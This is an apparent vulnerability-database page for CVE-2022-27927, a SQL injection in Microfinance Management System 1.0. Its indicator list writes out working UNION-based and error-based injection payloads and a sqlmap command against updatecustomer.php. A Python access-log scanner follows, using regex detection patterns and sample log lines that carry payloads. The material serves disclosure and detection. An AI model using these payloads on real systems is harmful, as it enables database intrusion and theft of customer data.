CVE-2022-27927
published 2022-04-19


Priority: P2 69 · Severity: critical 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: EXPLOIT
EPSS: 13.63% (96.0th percentile)
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.

Affected (1 range)

Vendor: microfinance_management_system_project
Product: microfinance_management_system
Version range: not given in the record
Fixed in: not given in the record

Detection & IOCs (extracted from sources)

url: /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'
url: /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27
path: /mims/updatecustomer.php
command: sqlmap.py -r poc.txt --dbms=mysql
command: customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  • Detect SQL injection attempts against the vulnerable endpoint by monitoring GET requests to /mims/updatecustomer.php with a manipulated 'customer_number' parameter containing SQL metacharacters or UNION/SELECT payloads.
  • The Nuclei template matcher checks for the md5 of '999999999' in the HTTP response body from /mims/updatecustomer.php, which confirms successful UNION-based SQL injection exploitation.
  • Monitor HTTP Referer header value 'http://localhost/mims/managecustomer.php' combined with SQLi payloads in the customer_number parameter as an indicator of exploitation attempts originating from the manage customer page.
  • Error-based SQLi payloads targeting this CVE use INFORMATION_SCHEMA.COLLATIONS with FLOOR(RAND(0)*2) and GROUP BY to trigger MySQL errors; alert on these patterns in query strings to /mims/updatecustomer.php.
  • The CVE also affects the 'course_code' parameter in addition to 'customer_number'; detection rules should cover both parameters.
  • The Nuclei template uses a single GET request (max-request: 1) targeting /mims/updatecustomer.php with a UNION-based payload; detection tuned only for this endpoint may miss exploitation via other vulnerable parameters or endpoints.
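As an added example (not part of the cbcvebase record and not code from the Microfinance Management System project), the following Python scans web-server access-log lines for requests to /mims/updatecustomer.php whose customer_number or course_code value carries the payload shapes listed in the detection notes above: a quote break, UNION ... SELECT, INFORMATION_SCHEMA, the FLOOR(RAND()) error-based pattern, and an OR n=n tautology. The log lines, addresses and timestamps are constructed for the example, and the pattern set is an assumption drawn from the IOCs on this page rather than an official rule; response-body checks such as the md5('999999999') match are out of scope because access logs do not carry the body.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format). Hosts, timestamps
# and requests are made up for this example; they are not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2022:10:01:02 +0000] "GET /mims/updatecustomer.php?customer_number=1042 HTTP/1.1" 200 512 "http://localhost/mims/managecustomer.php" "Mozilla/5.0"
10.0.0.7 - - [19/Apr/2022:10:01:09 +0000] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL HTTP/1.1" 200 2048 "http://localhost/mims/managecustomer.php" "python-requests/2.27"
10.0.0.9 - - [19/Apr/2022:10:02:15 +0000] "GET /mims/index.php?page=1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.11 - - [19/Apr/2022:10:03:40 +0000] "GET /mims/updatecustomer.php?course_code=X1%27%20and%206%3d3%20or%201%3d1 HTTP/1.1" 500 100 "-" "curl/7.81"
"""

VULN_PATH = "/mims/updatecustomer.php"
VULN_PARAMS = ("customer_number", "course_code")

# Named patterns matching the payload shapes in the IOC list above. The set is
# an assumption for this example, not a published detection rule.
SQLI_PATTERNS = {
    "quote": re.compile(r"'"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "or_tautology": re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Split one Combined Log Format line into its fields (None if malformed)."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding dict if the request hits the vulnerable endpoint with a
    suspicious value in one of the vulnerable parameters, else None."""
    parts = urlsplit(entry["target"])
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes values, so encoded payloads are inspected decoded
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in VULN_PARAMS:
        for value in params.get(name, []):
            reasons = [label for label, rx in SQLI_PATTERNS.items() if rx.search(value)]
            if reasons:
                return {
                    "ip": entry["ip"],
                    "ts": entry["ts"],
                    "param": name,
                    "value": value,
                    "reasons": reasons,
                    "status": entry["status"],
                    "referer": entry["referer"],
                }
    return None


def scan(log_text):
    """Run classify() over every log line and collect findings in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r} -> {', '.join(f['reasons'])}")
```

Because the page notes that both parameters are vulnerable and that the Nuclei template probes only one endpoint, the scanner keys on the parameter names rather than on a single payload, so a probe of course_code with a different injection shape is still reported; a quote alone in a numeric field is treated as worth a finding, which is deliberate for a parameter that should only ever carry an identifier.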

CVSS provenance

NVD · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P